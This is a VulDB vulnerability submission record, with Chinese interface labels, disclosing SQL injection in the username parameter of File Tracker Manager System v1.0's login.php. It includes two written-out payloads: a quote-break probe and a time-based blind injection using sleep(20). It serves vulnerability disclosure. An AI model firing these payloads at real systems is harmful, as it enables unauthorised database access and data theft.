提交 #99613: File Tracker Manager System v1.0 /file_manager/login.php post parameter username exists SQL injection vulnerability信息

标题File Tracker Manager System v1.0 /file_manager/login.php post parameter username exists SQL injection vulnerability
描述An issue was discovered in File Tracker Manager System v1.0. There is a SQL injection that can directly issue instructions to the background database system via /file_manager/login.php post parameter username. Payload1: username=a'&password=b Payload2:username=a' and (select 1 from (select(sleep(20)))a)-- a&password=b
来源⚠️ https://github.com/godownio/bug_report/blob/main/vendors/hemedy99/File%20Tracker%20Manager%20System/SQLi-1.md
用户
 godownio (UID 42581)
提交2023-03-09 07時02分 (3 年前)
管理2023-03-09 15時39分 (9 hours later)
状态已接受
VulDB条目222648 [SourceCodester File Tracker Manager System 1.0 POST Parameter /file_manager/login.php 用户名 SQL注入]
积分19

上一步一览下一步

Do you know our Splunk app?

Download it now for free!